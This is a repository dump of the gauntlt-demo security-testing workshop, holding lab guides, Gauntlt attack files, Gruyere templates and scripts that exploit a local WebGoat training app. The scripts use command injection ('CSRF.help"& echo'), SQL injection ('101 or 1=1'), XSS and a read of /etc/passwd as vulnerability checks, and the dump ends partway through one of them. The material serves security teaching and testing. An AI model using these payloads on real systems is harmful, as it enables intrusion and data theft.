20 | [[if:url]]
21 | File uploaded!
22 | File accessible at: {{url}}
23 | [[/if:url]]
24 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/labs/velocity-eu-2013/07_Working with Gauntlt CLI.md:
--------------------------------------------------------------------------------
1 | ## Working with the Gauntlt CLI
2 | As you may have noticed, in the port_check example, gauntlt comes with pre-packaged steps for you to use and doesn't allow you to create new ones (though that may change in the future). To work with gauntlt, you need to know what attack steps are available for you to use.
3 |
4 | Run each of these commands
5 | ```
6 | $ bundle exec gauntlt --help
7 | $ bundle exec gauntlt --allsteps
8 | $ bundle exec gauntlt --steps
9 | $ bundle exec gauntlt --list
10 | ```
11 |
12 | We will be doing a regex example next, so make sure you look through the output of `--allsteps` to be familiar with it.
--------------------------------------------------------------------------------
/labs/sxsw-2014/13_Working with Environment Variables.md:
--------------------------------------------------------------------------------
1 | ## Working with environment variables
2 | Sometimes you are going to want to read from environment variables to setup your profile in your attack files.
3 |
4 | ### Try the challenge
5 | To get started with this, go to `examples/env_vars` and open up `challenge_env-vars.attack`.
6 |
7 | ### Hints
8 | Check out the gauntlt wiki for a hint: [Using Cucumber Profiles and Environment Variables with Gauntlt](https://github.com/gauntlt/gauntlt/wiki/Using-Cucumber-Profiles-and-Environment-Variables-with-Gauntlt)
9 |
10 | ### Solution
11 | The answer is in `final_env-vars.attack` and you can compare it to your solution.
12 |
--------------------------------------------------------------------------------
/examples/dirb/README.md:
--------------------------------------------------------------------------------
1 | # Challenge
2 | Arachni is a powerful web application scanner written in ruby. We will use it to test for cross site scripting (XSS) on a site.
3 |
4 | # Hints
5 | You need to have arachni installed on your machine. It is a ruby gem, so you will need to add it to your Gemfile.
6 |
7 | Get started with arachni to get familiar with the output
8 | ```
9 | $ arachni --modules=xss --depth=1 --link-count=10 --auto-redundant=2 http://localhost:3000
10 | ```
11 | Once you feel good with working with the arachni output, check the `challenge_arachni-xss.attack` to get started.
12 |
13 | # Solution
14 | Check `final_arachni-xss.attack` for a working solution answer.
15 |
--------------------------------------------------------------------------------
/examples/form-injection/challenge_sqlmap-forms.attack:
--------------------------------------------------------------------------------
1 | @slow
2 | Feature: Run sqlmap against a target and test any web forms on the page
3 | # See:
4 | # https://github.com/sqlmapproject/sqlmap/wiki/Usage
5 |
6 | Scenario: Identify SQL injection vulnerabilities
7 | Given "sqlmap" is installed
8 | And the following profile:
9 | | name | value |
10 | | target_url | http://localhost:8008/login |
11 | When I launch a "sqlmap" attack with:
12 | """
13 | python | _cookie: | 11 |{{_cookie:pprint}} | 12 |
| _profile: | 15 |{{_profile:pprint}} | 16 |
| _db: | 19 |{{_db:pprint}} | 20 |
12 |
14 |
15 | [[if:_message]]
16 |
17 | [[/if:_message]]
18 |
19 | Gruyere: Upload Complete
13 |Gruyere: Manage the server
12 | 13 |
14 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-12/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-12.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => Numeric SQL Injection (vuln-12) exists.
4 |
5 | It will return a
6 |
7 | - False (error) if the vulnerability is present
8 | - True (success) if the vulnerability is fixed (aka not present)
9 |
10 | This test assumes 2 things:
11 |
12 | (1) That the requests library for python is installed as outlined in this guide: http://docs.python-requests.org/en/latest/user/install/#install
13 |
14 | ```
15 | $ pip install requests
16 | ```
17 |
18 | (2) The clone is located home/hacker/ (the default directory you get when opening a terminal)
19 |
20 | Test written by Blake Henry and Misty Francis
21 | Team: SKT-T1
22 |
23 |
24 |
--------------------------------------------------------------------------------
/labs/sxsw-2014/03_Setup using Bundler.md:
--------------------------------------------------------------------------------
1 | ## Using the Repo Only
2 | This is not the recommended method for completing the labs, however you may want to work with gauntlt natively on your machine rather than use virtual box. If you have RVM and homebrew installed, you should be ok.
3 |
4 | ### Initialize your box
5 | ```
6 | $ git clone https://github.com/gauntlt/gauntlt-demo
7 | $ cd ./gauntlt-demo
8 | $ git submodule update --init --recursive
9 | $ bundle
10 | ```
11 |
12 | ### Other tools
13 | Gauntlt is not a package manager and does not install security or testing tools. You will need to install the different tools that you use in the gauntlt attacks you write. One way to figure out what you need to install is to have a peak at our Travis CI build steps in `.travis.yml`.
14 |
--------------------------------------------------------------------------------
/labs/sxsw-2015/03_Setup using Bundler.md:
--------------------------------------------------------------------------------
1 | ## Using the Repo Only
2 | This is not the recommended method for completing the labs, however you may want to work with gauntlt natively on your machine rather than use virtual box. If you have RVM and homebrew installed, you should be ok.
3 |
4 | ### Initialize your box
5 | ```
6 | $ git clone https://github.com/gauntlt/gauntlt-demo
7 | $ cd ./gauntlt-demo
8 | $ git submodule update --init --recursive
9 | $ bundle
10 | ```
11 |
12 | ### Other tools
13 | Gauntlt is not a package manager and does not install security or testing tools. You will need to install the different tools that you use in the gauntlt attacks you write. One way to figure out what you need to install is to have a peak at our Travis CI build steps in `.travis.yml`.
14 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-28/vuln-28.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import re
3 | import json
4 | import sys
5 | import requests
6 |
7 | s = requests.Session()
8 |
9 | response = s.get("http://127.0.0.1:8080/WebGoat/login.mvc")
10 |
11 | response = s.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check", data={'username': 'guest', 'password': 'guest'})
12 |
13 | response = s.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
14 | url = json.loads(response.text)[16].get('children')[1].get('link')
15 |
16 |
17 | response = s.get("http://127.0.0.1:8080/WebGoat/"+url)
18 |
19 | response = s.post("http://127.0.0.1:8080/WebGoat/"+url, data={'QTY': 1, 'Price': 1})
20 |
21 | if "Congratulations" in response.text:
22 | print "Attack Successful"
23 | else:
24 | print "Passed"
25 |
--------------------------------------------------------------------------------
/examples/dirb/dirb.attack:
--------------------------------------------------------------------------------
1 | @slow
2 | Feature: Run dirb scan on a URL
3 |
4 | Scenario: Use dirb to scan a website for basic security requirements and the DIRB_WORDLISTS environment variable must be set in your path. You can use different wordlists by changing the environment variable.
5 | Given "dirb" is installed
6 | And the following profile:
7 | | name | value |
8 | | hostname | https://google.com |
9 | | dirb_wordlists_path | Overwritten by $DIRB_WORDLISTS |
10 | | wordlist | vulns/tests.txt |
11 | When I launch a "dirb" attack with:
12 | """
13 | dirb Gruyere: Upload
12 | 13 |
14 | 
'
22 |
23 | vulnString = 'Hello, !'
24 |
25 | vulnerable = browser.html.include? vulnString
26 |
27 | browser.close
28 |
29 | headless.destroy
30 |
31 | if vulnerable
32 | puts "Vulnerable"
33 |
34 | exit 1
35 | else
36 | puts "Safe"
37 |
38 | exit 0
39 | end
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/login.gtl:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Gruyere: Login
6 | [[include:base.css]][[/include:base.css]]
7 |
8 |
9 |
10 | [[include:menubar.gtl]][[/include:menubar.gtl]]
11 | -o my_garmr_output.xml
12 | """
13 | Then it should pass with:
14 | """
15 | [Garmr.corechecks.WebTouch] Pass The request returned an HTTP 200 response
16 | """
17 | And the file "my_garmr_output.xml" should contain XML:
18 | | css |
19 | | testcase[name="HttpsLoginForm"] skipped |
20 | And the file "my_garmr_output.xml" should not contain XML:
21 | | css |
22 | | testcase[name="InlineJS"] failure |
23 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-08/vuln-08.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | s = requests.session()
5 |
6 | #Going to the WebGoat page
7 | s.get("http://127.0.0.1:8080/WebGoat")
8 |
9 | data = {'username': 'guest', 'password':'guest'}
10 |
11 | #Logging in
12 | s.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check;jsessionid=" + str(s.cookies), data)
13 |
14 | #Getting lesson plans for screen and menu
15 | r = s.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
16 |
17 | hiddenScreenMenu = str(r.text)
18 | splitScreenMenu = hiddenScreenMenu.split("},{")
19 | for i in splitScreenMenu:
20 | if "Reflected XSS Attack" in i:
21 | splitI = i.split(",")
22 | noQuotes = splitI[4].split("\"")
23 |
24 | #Submitting the script
25 | data = {'QTY1': '1', 'QTY2': '1', 'QTY3' : '1', 'QTY4' : '1', 'field2' : '4128+3214+0002+1999', 'field1':'', 'SUBMIT':'Purchase'}
26 | r = s.post("http://127.0.0.1:8080/WebGoat/" + noQuotes[3], data)
27 | print r.text
28 |
--------------------------------------------------------------------------------
/labs/velocity-eu-2013/04_Hello World with Gauntlt.md:
--------------------------------------------------------------------------------
1 | ## Hello World
2 | From the `gauntlt-demo` directory, run the following
3 | ```
4 | $ bundle exec gauntlt ./examples/hello_world/hello_world.attack
5 | ```
6 |
7 | If all succeeded, you should see the resulting output
8 | ```
9 | @final
10 | Feature: hello world with gauntlt using the generic command line attack
11 |
12 | Scenario: # ./examples/hello_world/hello_world.attack:3
13 | When I launch a "generic" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/generic.rb:1
14 | """
15 | cat /etc/passwd
16 | """
17 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
18 | """
19 | root
20 | """
21 |
22 | 1 scenario (1 passed)
23 | 2 steps (2 passed)
24 | 0m0.175s
25 | ```
26 |
27 | Notice how we used `Feature` and `Scenario` here. We could have created a `Background` if we had any setup steps that needed to be run before each `Scenario`.
28 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-11/vuln-11-runner.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | wg = "http://127.0.0.1:8080/WebGoat/"
4 |
5 | #login
6 | s = requests.Session()
7 | s.get(wg + "login.mvc")
8 | s.auth = ('guest', 'guest')
9 | loginURL = wg + "j_spring_security_check"
10 | secondLoginRequest = s.post(loginURL, data={'username':'guest', 'password':'guest'})
11 |
12 | #get screen and menu
13 | lessonRequest = s.get(wg + "service/lessonmenu.mvc")
14 | lessonJSON = lessonRequest.json()
15 | commandInjectionLink = lessonJSON[10]['children'][0]['link']
16 |
17 | #command injection attack
18 | attackURL = wg + commandInjectionLink
19 | injectedInput = 'CSRF.help"& echo ctrl_alt_compete\"'
20 | attackPayload = {'HelpFile':injectedInput, 'SUBMIT':'View'}
21 | attack = s.get(attackURL, params=attackPayload)
22 |
23 | #Analyze results for failure
24 | #If the expected attack string is not found
25 | if not (attack.text.find("
ctrl_alt_compete
") > 0): 26 | print "vuln-11 not present" 27 | else: 28 | print "Attack Successful" 29 | -------------------------------------------------------------------------------- /labs/velocity-eu-2013/02_Using Vagrant Box.md: -------------------------------------------------------------------------------- 1 | ## Using the Vagrant Box 2 | 3 | ### Download [gauntlt-velocity.box](http://bit.ly/velocity-gauntlt) (~700MB) 4 | ``` 5 | wget http://bit.ly/velocity-gauntlt 6 | ``` 7 | 8 | ### Install Vagrant 9 | ``` 10 | http://downloads.vagrantup.com/ 11 | ``` 12 | 13 | ### Set up a working directory 14 | ``` 15 | mkdir ~/velocity 16 | cd ~/velocity 17 | vagrant box add velocity /path/where/you/downloaded/gauntlt-velocity.box 18 | vagrant init velocity 19 | ``` 20 | 21 | ### Edit VagrantFile and add this line 22 | ``` 23 | config.vm.network :forwarded_port, guest: 3000, host: 3000 24 | ``` 25 | 26 | ### Start up the box 27 | ``` 28 | vagrant up 29 | vagrant ssh 30 | ``` 31 | You should be greeted with `vagrant@precise32:~$` if it all worked ok. 32 | 33 | ### Initialize 34 | Make sure the repo is up-to-date 35 | ``` 36 | vagrant@precise32:~$ cd gauntlt-demo 37 | vagrant@precise32:~/gauntlt-demo$ git pull 38 | vagrant@precise32:~/gauntlt-demo$ rvm use 1.9.3 39 | vagrant@precise32:~/gauntlt-demo$ bundle install 40 | ``` 41 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-23/readme.md: -------------------------------------------------------------------------------- 1 | TEST vuln-23.attack 2 | 3 | This is a Gauntlt test to check if the vulnerability in WebGoat Denial of Service -> ZipBomb exists. 4 | 5 | It will pass if 6 | 7 | The webpage contains the phrase "* File uploaded" 8 | The webpage doesn't contain the phrase "* Congratulations" 9 | 10 | This test assumes 3 things: 11 | 12 | (1) That Easy Install, pip, the python requests module are installed and available on the $PATH and uses the generic command-line attack. To install these run the following command on Debian-based systems aka those using .deb packages. 13 | 14 | $ sudo apt-get install python-setuptools 15 | $ sudo easy_install pip 16 | $ sudo pip install requests 17 | 18 | (2) That the provided zipBomb.zip is in the same directory as the attack. The zipBomb is just a large txt file that contains all "1"s. 19 | 20 | (3) There is a local proxy running on 127.0.0.1:8888 21 | 22 | Testing vuln-00 can be done outside of Gauntlt by navigating to the webgoat/vuln-00 directory and running: 23 | 24 | $ python exploit-vuln-23.py 25 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-11/README.md: -------------------------------------------------------------------------------- 1 | This Gauntlt test was written by Alexandra Gibner (atg572) and Peter Ten Eyck (pwt249) 2 | 3 | This is a Gauntlt test to check if the vulnerability located at Injection Flaws => Command Injection (vuln-11) exists in Webgoat. 4 | 5 | It will return 6 | - "Attack Successful" if the vulnerability is present 7 | - "vuln-11 not present" if the vulnerability is not present (aka fixed) 8 | 9 | This test assumes 4 things: 10 | 11 | (1) That Python 2.x is installed and available on the $PATH 12 | ``` 13 | #as root 14 | $ sudo apt-get install python 15 | ``` 16 | (2) That the requests Python library is available 17 | ``` 18 | #as root 19 | $ sudo apt-get install python-pip 20 | $ sudo pip install requests 21 | ``` 22 | (3) There is a local proxy running at 127.0.0.1:8080 23 | 24 | (4) There exists a copy of the python script (vuln-11-runner.py) at /home/hacker/webgoat/ 25 | 26 | Testing vuln-11 can be done outside of Gauntlt by navigating to the /home/hacker/webgoat/ directory and running 27 | ``` 28 | ./vuln-11-runner.py 29 | ``` 30 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-16/README.md: -------------------------------------------------------------------------------- 1 | TEST vuln-16.attack 2 | 3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => LAB: SQL Injection => Stage 3: Numeric SQL Injection (vuln-16) exists. 4 | 5 | It will return a 6 | - FAIL (error) if the vulnerability is present 7 | - PASS (success) if the vulnerability is fixed (aka not present) 8 | 9 | This test assumes 3 things: 10 | 11 | (1) That python and virtualenv are installed. To install these run the following command on Debian-based systems aka those using .deb packages. 12 | 13 | ``` 14 | $ sudo apt-get install python virtualenv 15 | ``` 16 | 17 | (2) That gauntlt-demo is installed to the user's home directory (i.e. ~/gauntlt-demo) 18 | 19 | (3) That the user's home directory is /home/tyler/ 20 | 21 | Testing vuln-16 can be done outside of Gauntlt by navigating to the webgoat/vuln-16 directory and running: 22 | 23 | ``` 24 | $ python vuln-16.py 25 | ``` 26 | 27 | This Gauntlt test was written by Tyler O'Meara (Tyler@TylerOMeara.com) on Sat, 5 Dec 2015 20:36:00 -0600 28 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-44/README.md: -------------------------------------------------------------------------------- 1 | TEST vuln-44.attack 2 | 3 | This test checks for the vulnerability in webgoat titled Off-by-One Overflows under the Buffer Overflows section. 4 | 5 | It will return a 6 | - 1 (error) if the vulnerability is present 7 | - 0 (success) if the vulnerability is fixed (aka not present) 8 | 9 | This test assumes 3 things: 10 | 11 | (1) That the python package Requests is installed 12 | ``` 13 | $ sudo apt-get install python-pip; sudo pip install requests 14 | ``` 15 | 16 | (2) Gauntlt is being run from the base of the repo. For example, if you cloned the repo into /home/hacker, 17 | the current working directory when running gauntlet should be /home/hacker/gauntlt-demo/ 18 | 19 | (3) There is a local proxy running on 127.0.0.1:8888 20 | 21 | Testing vuln-44 can be done outside of Gauntlt by navigating to the webgoat/vuln-44 directory and running: 22 | 23 | ``` 24 | $ python attack.py 25 | ``` 26 | 27 | This Gauntlt test was written by Patrick Aupperle and Ousek Son from team Admin on Thu, 10 Dec 2015 28 | -------------------------------------------------------------------------------- /vendor/gruyere/source/resources/newsnippet.gtl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |Gruyere: New Snippet
6 | [[include:base.css]][[/include:base.css]]
7 |
8 |
9 |
10 | [[include:menubar.gtl]][[/include:menubar.gtl]]
11 |
Select a file to upload to your account.
15 | 16 | [[if:_message]] 17 | 18 | [[/if:_message]] 19 | 20 |
21 |
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-33/README.md:
--------------------------------------------------------------------------------
1 | Vulnerability-33, Web Services SQL Injection
2 |
3 | The python script uses the requests library, which needed to be installed. Before the requests library was installed however pip first needed to be installed. This was done in root terminal (Superuser) via: python get-pip.py Once pip was installed, the requests library was installed via root terminal using: pip install requests
4 |
5 | The path of the Python script must be included in the attack file. The contents of the attack file include the following path: python /home/hacker/test-gauntlt/injection-test/sql-injection2.py
6 |
7 | Once both the Python script and the attack file are in the same directory, use gauntlt vuln-33.attack to run.
8 |
9 | If an error occurs while running, repeat the install directions: source .rvm/scripts/rvm Then type: which gauntlt in order to ensure that gems is installed.
10 |
11 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-10/exploit-vuln-10.py:
--------------------------------------------------------------------------------
1 | import os
2 | import requests
3 | import json
4 |
5 | def main():
6 | s = requests.Session()
7 | r = s.get("http://127.0.0.1:8080/WebGoat")
8 | payload = {'username': 'guest', 'password': 'guest'}
9 | r1 = s.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check", payload)
10 | r2 = s.get("http://127.0.0.1:8080/WebGoat/attack?Screen=193&menu=1000")
11 | r3 = s.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc")
12 | loaded_json = json.loads(r3.text)
13 | dynamic_url = loaded_json[9]['children'][0]['link']
14 | payload = {'Username': 'webgoat', 'SUBMIT':'Login'}
15 | r4 = s.post("http://127.0.0.1:8080/WebGoat/" + dynamic_url, payload)
16 |
17 | if "You have been authenticated with Fail Open Error Handling" in r4.text:
18 | print("Attack Successful")
19 | return 1
20 | else:
21 | print("vuln-10 not present")
22 | return 0
23 |
24 | main()
25 |
26 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-40/vuln-40.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 |
3 | require 'rubygems'
4 | require 'watir-webdriver'
5 | require 'headless'
6 |
7 | headless = Headless.new
8 | headless.start
9 |
10 | browser = Watir::Browser.new
11 | browser.goto 'http://127.0.0.1:8080/WebGoat/login.mvc'
12 |
13 | browser.text_field(:name => 'username').set 'guest'
14 | browser.text_field(:name => 'password').set 'guest'
15 |
16 | browser.button(:value, "Sign in").click
17 |
18 | browser.link(:index => 23).click
19 | browser.link(:index => 25).click
20 |
21 | browser.text_field(:name => 'person').set ''
22 |
23 | vulnString = 'Hello, !'
24 |
25 | vulnerable = browser.html.include? vulnString
26 |
27 | browser.close
28 |
29 | headless.destroy
30 |
31 | if vulnerable
32 | puts "Vulnerable"
33 |
34 | exit 1
35 | else
36 | puts "Safe"
37 |
38 | exit 0
39 | end
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/login.gtl:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
12 |
14 |
15 | [[if:_message]]
16 |
17 | [[/if:_message]]
18 |
19 | Gruyere: Login
13 |
20 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
1 | language: ruby
2 | rvm:
3 | - 2.0.0
4 | before_install:
5 | - git submodule update --init --recursive
6 | before_script:
7 | - sudo apt-get install nmap
8 | - sudo apt-get install wget
9 | - sudo apt-get install libcurl4-openssl-dev
10 | - 'pwd'
11 | - export SSLYZE_PATH="/home/travis/build/gauntlt/gauntlt-demo/vendor/sslyze/sslyze.py"
12 | - export SQLMAP_PATH="/home/travis/build/gauntlt/gauntlt-demo/vendor/sqlmap/sqlmap.py"
13 | - 'cd vendor/Garmr && sudo python setup.py install && cd ../..'
14 | - 'cd vendor && wget http://downloads.sourceforge.net/project/dirb/dirb/2.03/dirb203.tar.gz && tar xvfz dirb203.tar.gz && cd dirb && ./configure && make && sudo cp dirb /usr/local/bin/ && cd ../../'
15 | - export DIRB_WORDLISTS="/home/travis/build/gauntlt/gauntlt/vendor/dirb/wordlists"
16 | notifications:
17 | irc:
18 | channels:
19 | - "chat.freenode.net#gauntlt"
20 | use_notice: true
21 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-12/sql_injection.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | params = {}
5 |
6 | params['username'] = "guest"
7 | params['password'] = "guest"
8 |
9 | r = requests.post("http://127.0.0.1:8080/WebGoat/j_spring_security_check", data = params)
10 |
11 | tempCookie = r.history[0].cookies['JSESSIONID']
12 |
13 | #have to pass cookies as a dictionary
14 | brownies = dict(JSESSIONID = tempCookie)
15 |
16 | params = {}
17 | params['station'] = "101 or 1=1"
18 | params['SUBMIT'] = "Go!"
19 |
20 |
21 | r = requests.get("http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc", cookies = brownies)
22 | getJSON = list(r.json())
23 | linkName = getJSON[10]["children"][1]["link"]
24 |
25 | temp = "http://127.0.0.1:8080/WebGoat/" + linkName
26 |
27 | r = requests.post(temp, cookies = brownies, data = params)
28 |
29 | temp = r.text
30 |
31 | print(not("Error parsing station as a number" in temp))
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-30/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-30.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Parameter Tampering => Bypass Client Side JavaScript Validation (vuln-30) exists.
4 |
5 | It will return
6 |
7 | * `vuln-30 is present` if the vulnerability is present
8 |
9 | * `vuln-30 not present` (success) if the vulnerability is fixed (aka not present)
10 |
11 | This test assumes 4 things:
12 |
13 | (1) The Python library Requests is installed
14 |
15 | `$ pip install requests`
16 |
17 | (2) There is a local proxy running on 127.0.0.1:8888
18 |
19 | Testing vuln-30 can be done outside of Gauntlt by navigating to the webgoat/vuln-30 directory and running:
20 |
21 | `$ python exploit-vuln-30.py`
22 |
23 | (3) Gauntlt is installed
24 |
25 | (4) The files are all located in the path
26 |
27 | `/home/hacker/vuln-30/`
28 |
29 | This Gauntlt test was written by Hao-Hsiang Chi and Tarequl Alam from team Anthing Man on Tuesday, 8 Dec 2015
30 |
--------------------------------------------------------------------------------
/examples/garmr/final_garmr.attack:
--------------------------------------------------------------------------------
1 | @final @slow @no-clobber
2 | Feature: Run a Garmr scan on a single URL
3 |
4 | Scenario: Use Garmr to scan a website for basic security requirements
5 | Given "garmr" is installed
6 | And the following profile:
7 | | name | value |
8 | | target_url | http://localhost:8008 |
9 | When I launch a "garmr" attack with:
10 | """
11 | garmr -u ctrl_alt_compete
") > 0): 26 | print "vuln-11 not present" 27 | else: 28 | print "Attack Successful" 29 | -------------------------------------------------------------------------------- /labs/velocity-eu-2013/02_Using Vagrant Box.md: -------------------------------------------------------------------------------- 1 | ## Using the Vagrant Box 2 | 3 | ### Download [gauntlt-velocity.box](http://bit.ly/velocity-gauntlt) (~700MB) 4 | ``` 5 | wget http://bit.ly/velocity-gauntlt 6 | ``` 7 | 8 | ### Install Vagrant 9 | ``` 10 | http://downloads.vagrantup.com/ 11 | ``` 12 | 13 | ### Set up a working directory 14 | ``` 15 | mkdir ~/velocity 16 | cd ~/velocity 17 | vagrant box add velocity /path/where/you/downloaded/gauntlt-velocity.box 18 | vagrant init velocity 19 | ``` 20 | 21 | ### Edit VagrantFile and add this line 22 | ``` 23 | config.vm.network :forwarded_port, guest: 3000, host: 3000 24 | ``` 25 | 26 | ### Start up the box 27 | ``` 28 | vagrant up 29 | vagrant ssh 30 | ``` 31 | You should be greeted with `vagrant@precise32:~$` if it all worked ok. 32 | 33 | ### Initialize 34 | Make sure the repo is up-to-date 35 | ``` 36 | vagrant@precise32:~$ cd gauntlt-demo 37 | vagrant@precise32:~/gauntlt-demo$ git pull 38 | vagrant@precise32:~/gauntlt-demo$ rvm use 1.9.3 39 | vagrant@precise32:~/gauntlt-demo$ bundle install 40 | ``` 41 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-23/readme.md: -------------------------------------------------------------------------------- 1 | TEST vuln-23.attack 2 | 3 | This is a Gauntlt test to check if the vulnerability in WebGoat Denial of Service -> ZipBomb exists. 4 | 5 | It will pass if 6 | 7 | The webpage contains the phrase "* File uploaded" 8 | The webpage doesn't contain the phrase "* Congratulations" 9 | 10 | This test assumes 3 things: 11 | 12 | (1) That Easy Install, pip, the python requests module are installed and available on the $PATH and uses the generic command-line attack. To install these run the following command on Debian-based systems aka those using .deb packages. 13 | 14 | $ sudo apt-get install python-setuptools 15 | $ sudo easy_install pip 16 | $ sudo pip install requests 17 | 18 | (2) That the provided zipBomb.zip is in the same directory as the attack. The zipBomb is just a large txt file that contains all "1"s. 19 | 20 | (3) There is a local proxy running on 127.0.0.1:8888 21 | 22 | Testing vuln-00 can be done outside of Gauntlt by navigating to the webgoat/vuln-00 directory and running: 23 | 24 | $ python exploit-vuln-23.py 25 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-11/README.md: -------------------------------------------------------------------------------- 1 | This Gauntlt test was written by Alexandra Gibner (atg572) and Peter Ten Eyck (pwt249) 2 | 3 | This is a Gauntlt test to check if the vulnerability located at Injection Flaws => Command Injection (vuln-11) exists in Webgoat. 4 | 5 | It will return 6 | - "Attack Successful" if the vulnerability is present 7 | - "vuln-11 not present" if the vulnerability is not present (aka fixed) 8 | 9 | This test assumes 4 things: 10 | 11 | (1) That Python 2.x is installed and available on the $PATH 12 | ``` 13 | #as root 14 | $ sudo apt-get install python 15 | ``` 16 | (2) That the requests Python library is available 17 | ``` 18 | #as root 19 | $ sudo apt-get install python-pip 20 | $ sudo pip install requests 21 | ``` 22 | (3) There is a local proxy running at 127.0.0.1:8080 23 | 24 | (4) There exists a copy of the python script (vuln-11-runner.py) at /home/hacker/webgoat/ 25 | 26 | Testing vuln-11 can be done outside of Gauntlt by navigating to the /home/hacker/webgoat/ directory and running 27 | ``` 28 | ./vuln-11-runner.py 29 | ``` 30 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-16/README.md: -------------------------------------------------------------------------------- 1 | TEST vuln-16.attack 2 | 3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Injection Flaws => LAB: SQL Injection => Stage 3: Numeric SQL Injection (vuln-16) exists. 4 | 5 | It will return a 6 | - FAIL (error) if the vulnerability is present 7 | - PASS (success) if the vulnerability is fixed (aka not present) 8 | 9 | This test assumes 3 things: 10 | 11 | (1) That python and virtualenv are installed. To install these run the following command on Debian-based systems aka those using .deb packages. 12 | 13 | ``` 14 | $ sudo apt-get install python virtualenv 15 | ``` 16 | 17 | (2) That gauntlt-demo is installed to the user's home directory (i.e. ~/gauntlt-demo) 18 | 19 | (3) That the user's home directory is /home/tyler/ 20 | 21 | Testing vuln-16 can be done outside of Gauntlt by navigating to the webgoat/vuln-16 directory and running: 22 | 23 | ``` 24 | $ python vuln-16.py 25 | ``` 26 | 27 | This Gauntlt test was written by Tyler O'Meara (Tyler@TylerOMeara.com) on Sat, 5 Dec 2015 20:36:00 -0600 28 | -------------------------------------------------------------------------------- /examples/webgoat/vuln-44/README.md: -------------------------------------------------------------------------------- 1 | TEST vuln-44.attack 2 | 3 | This test checks for the vulnerability in webgoat titled Off-by-One Overflows under the Buffer Overflows section. 4 | 5 | It will return a 6 | - 1 (error) if the vulnerability is present 7 | - 0 (success) if the vulnerability is fixed (aka not present) 8 | 9 | This test assumes 3 things: 10 | 11 | (1) That the python package Requests is installed 12 | ``` 13 | $ sudo apt-get install python-pip; sudo pip install requests 14 | ``` 15 | 16 | (2) Gauntlt is being run from the base of the repo. For example, if you cloned the repo into /home/hacker, 17 | the current working directory when running gauntlet should be /home/hacker/gauntlt-demo/ 18 | 19 | (3) There is a local proxy running on 127.0.0.1:8888 20 | 21 | Testing vuln-44 can be done outside of Gauntlt by navigating to the webgoat/vuln-44 directory and running: 22 | 23 | ``` 24 | $ python attack.py 25 | ``` 26 | 27 | This Gauntlt test was written by Patrick Aupperle and Ousek Son from team Admin on Thu, 10 Dec 2015 28 | -------------------------------------------------------------------------------- /vendor/gruyere/source/resources/newsnippet.gtl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
Gruyere: New Snippet
12 | 13 |
14 | 102 '}
18 |
19 | ######################################################################
20 |
21 | #Step 1: Login
22 | request = requests.Session()
23 | request.get(login_url)
24 | login = request.post(post_url, data=login_data)
25 |
26 |
27 | if login.status_code != 200 :
28 | print "Bad request"
29 |
30 | else :
31 | #Step 2 : Menu retrieval and parsing
32 | menu = request.get(menu_url)
33 | menu_json = menu.json()
34 | menu_link = menu_json[18]['children'][2]['link']
35 |
36 | #Step 3: Attack Vulnerability Page
37 | attack_url = base_url + menu_link
38 | attack_page = request.get(attack_url)
39 | attack = request.post(attack_url, data=attack_string)
40 |
41 | #Step 4: Check for Success
42 | if attack.text.find(success) == 1 :
43 | print 'No Vulnerability'
44 | else :
45 | print 'Vuln-34 Present'
46 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-26/attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import os
3 |
4 | class attack:
5 |
6 | session = requests.Session()
7 |
8 | # the login page
9 | url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
10 | # where login credentials are posted to
11 | url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
12 | # login payload
13 | payload = {'username':'guest','password':'guest'}
14 | # takes us to the login page
15 | first = session.get(url1)
16 | # log in
17 | login = session.post(url2, data=payload)
18 |
19 | # where our attack is posted
